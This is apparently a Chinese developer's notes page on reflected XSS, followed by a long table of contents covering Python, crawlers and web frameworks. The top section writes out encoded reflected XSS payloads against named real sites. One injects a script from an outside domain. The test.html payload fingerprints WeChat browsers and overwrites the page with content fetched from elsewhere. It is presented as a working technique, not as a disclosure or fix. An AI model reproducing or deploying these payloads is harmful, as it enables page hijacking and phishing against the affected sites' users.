## **url编码解码**,又叫百分号编码
```
http://bttv.kuwo.cn/US/pf/BindWeibo?fans=%27%29%3BsetTimeout%28atob%28%27ZG9jdW1lbnQuYm9keS5pbm5lckhUTUwgPSAnJztkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpKS5zcmM9Jy8vbG9jYWxob3N0L3Rlc3QuaHRtbCc7%27%29%2C0%29%3B//%26money%3D47.81
http://bttv.kuwo.cn/US/pf/BindWeibo?fans=');setTimeout(atob('ZG9jdW1lbnQuYm9keS5pbm5lckhUTUwgPSAnJztkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpKS5zcmM9Jy8vbG9jYWxob3N0L3Rlc3QuaHRtbCc7'),0);//&money=47.81
```
## Base64编码,解码
```
ZG9jdW1lbnQuYm9keS5pbm5lckhUTUwgPSAnJztkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpKS5zcmM9Jy8vbG9jYWxob3N0L3Rlc3QuaHRtbCc7
document.body.innerHTML = '';document.head.appendChild(document.createElement('script')).src='//localhost/test.html';
```
- test.html
```
define = null;
require = null;
var ua = navigator.userAgent.toLowerCase();
if (/micromessenger/.test(ua)) {
var app = document.createElement('div');
app.setAttribute('style', 'line-height: 1.6;font-family: -apple-system-font, "Helvetica Neue", sans-serif;');
app.innerHTML = '<div style="font-weight: 300;text-align: center">loading...</div>';
if (document.body)
document.body.appendChild(app);
document.title = "正在打开...";
var xhr = new XMLHttpRequest;
var html = null;
function getParam(name, url) {
var r = new RegExp('(\?|#|&)' + name + '=(.*?)(#|&|$)');
var m = (url || location.href).match(r);
return (m ? m[2] : '')
}
function render() {
var a = document.open("text/html", "replace");
a.write(html);
a.close()
}
xhr.onload = function() {
html = xhr.responseText;
var delay = 0;
if (delay > 0)
setTimeout("render()", delay * 1000);
else
render()
};
xhr.open("GET", "<? echo $url?>" + Date.now(), !0);
xhr.send();
} else {
window.location.replace("https://www.qq.com");
}
```
- 几种反射的方式
```
http://bttv.kuwo.cn/US/pf/BindWeibo?fans=');setTimeout(atob('ZG9jdW1lbnQuYm9keS5pbm5lckhUTUwgPSAnJztkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpKS5zcmM9Jy8vbG9jYWxob3N0L3Rlc3QuaHRtbCc7'),0);//&money=47.81
https://account.talkingdata.com/regist.jsp?backurl=weixun';document['write'](atob('PHNjcmlwdC9zcmM9Ly9idXBhbGEuY24vZD48L3NjcmlwdD4='));//
```
- 工欲善其事必先利其器
- 请求库
- 解析库
- 数据库
- 存储库
- Web库
- app爬取相关库
- 爬虫框架
- 部署相关库
- ipython
- 基础
- 数学函数
- 随机函数
- 三角函数
- 字符串内建函数
- 列表方法
- 字典内置方法
- 正则表达式
- os
- 字符串及数字的判断
- 常用魔术方法
- db
- mongodb
- mysql
- redis
- ORM
- ODM
- mongodb操作方法
- sqlite3
- access
- files
- Excel
- xml文件
- Python环境
- anaconda
- pip常用命令
- virtualenv
- pyenv
- cmder
- 远程开发
- Jupyter
- crawler
- appium环境搭建
- adb工具
- uiautomator
- 运行Appium+Python Clinet + 夜神模拟器
- DesiredCapabilities参数大全
- requests
- scrapy
- gerapy
- scrapyd
- 请求头fake_useragent库
- 数据传递过程
- 数据清洗及入库pipelines.py
- scrapy调用阿布云代理
- 图片下载
- PyQt5
- pyinstaller
- 攻防
- xss
- xss反射
- Chrome模拟微信浏览器
- flask
- 注册app
- 蓝图Blueprint
- 表单验证wtforms
- Flask-SQLAlchemy
- 数据处理
- json
- tornado
- settings
- 工具
- fiddler
- ab压力测试工具
- 高阶
- 队列
- 多线程
- 消息队列
- 定时任务框架APScheduler
- Django
- 路由分离
- 模型
- admin
- Android
- apk逆向工程